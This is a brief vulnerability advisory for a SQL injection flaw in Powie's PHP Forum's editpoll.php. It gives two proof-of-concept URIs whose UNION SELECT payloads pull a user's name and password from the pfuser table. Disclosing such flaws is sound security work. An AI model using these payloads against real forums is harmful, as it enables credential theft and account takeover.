|
Powie's PHP Forum EditPoll.PHP SQL Injection Vulnerability
An attacker can exploit this issue via a web client. The following proof-of-concept URIs are available: User: http://www.example.com/editpoll.php?id=-1 UNION SELECT null,null,username,null FROM pfuser where id=1 Pass: http://www.example.com/editpoll.php?id=-1 UNION SELECT null,null,pwd,null FROM pfuser where id=1 |
|
|
Privacy Statement |